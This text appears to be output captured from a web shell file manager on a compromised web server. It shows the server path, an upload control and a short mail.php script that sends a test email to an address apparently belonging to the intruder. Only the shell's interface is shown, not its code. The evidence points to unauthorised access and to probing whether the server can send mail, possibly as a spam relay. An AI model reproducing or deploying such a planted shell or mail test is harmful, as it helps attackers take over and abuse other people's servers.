Your IP : 216.73.216.91


Current Path : /var/www/html/vippaan/
Upload File :
Current File : /var/www/html/vippaan/mail.php

<?php
// the message
$msg = "First line of text\nSecond line of text";

// use wordwrap() if lines are longer than 70 characters
$msg = wordwrap($msg,70);

// send email
mail("hackbaby1996@gmail.com","My subject",$msg);
?>